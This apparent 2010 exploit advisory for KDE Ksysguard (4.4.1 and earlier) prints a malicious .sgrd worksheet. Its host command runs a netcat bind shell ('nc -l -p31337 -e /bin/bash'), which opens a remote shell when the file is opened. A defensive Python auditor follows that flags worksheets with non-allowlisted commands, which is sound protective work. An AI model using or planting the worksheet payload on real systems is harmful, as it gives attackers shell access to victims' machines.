KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting
Source: http://www.backtrack.it/~emgent  Author: emgent  Published: 2010-03-22

# Exploit Title: Ksysguard RCE via Cross Application Scripting
# Date: 2010 03 20
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
# Version: <= 4.4.1
# CVE : N/A
# Vendor: http://www.kde.org
# Video: http://www.backtrack.it/~emgent/videos/16032010_-_SecuritySummit_CAS_OWNING_KDE.mov
# About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting
#            http://it.wikipedia.org/wiki/Cross_Application_Scripting

 

halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$
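
A defensive check for the worksheet format shown above, added here as an example and not part of the original advisory: it parses a .sgrd file and reports any host element whose command attribute is not on an allowlist. The allowlist value ksysguardd, the function name audit_worksheet and both sample worksheets are assumptions constructed for illustration.

```python
import sys
import xml.etree.ElementTree as ET

# Assumption: a worksheet saved locally starts the stock daemon "ksysguardd";
# extend this allowlist if your site uses another known-good command.
ALLOWED_COMMANDS = {"", "ksysguardd"}

# Constructed sample inputs (not taken from the advisory).
SAMPLE_BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="Load" interval="2" locked="0" rows="1" columns="1">
<host name="localhost" command="ksysguardd" /> </WorkSheet>"""
SAMPLE_SUSPECT = SAMPLE_BENIGN.replace(
    'command="ksysguardd"', 'command="/opt/placeholder/not-ksysguardd --flag"')


def audit_worksheet(xml_text):
    """Return a list of findings for one .sgrd worksheet passed as text."""
    if "<!ENTITY" in xml_text:
        # Worksheets do not need entity declarations; do not expand them.
        return ["entity declaration present, file not parsed"]
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    findings = []
    if root.tag != "WorkSheet":
        findings.append("unexpected root element <%s>" % root.tag)
    for host in root.iter("host"):
        command = (host.get("command") or "").strip()
        if command not in ALLOWED_COMMANDS:
            findings.append("host element runs non-default command: %r" % command)
    return findings


if __name__ == "__main__":
    # Usage: python audit_sgrd.py file1.sgrd [file2.sgrd ...]
    status = 0
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as handle:
            for finding in audit_worksheet(handle.read()):
                print("%s: %s" % (path, finding))
                status = 1
    sys.exit(status)
```

Run it over worksheets received from mail, downloads or shared folders before they are opened; a non-zero exit status means at least one file was flagged.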

 


 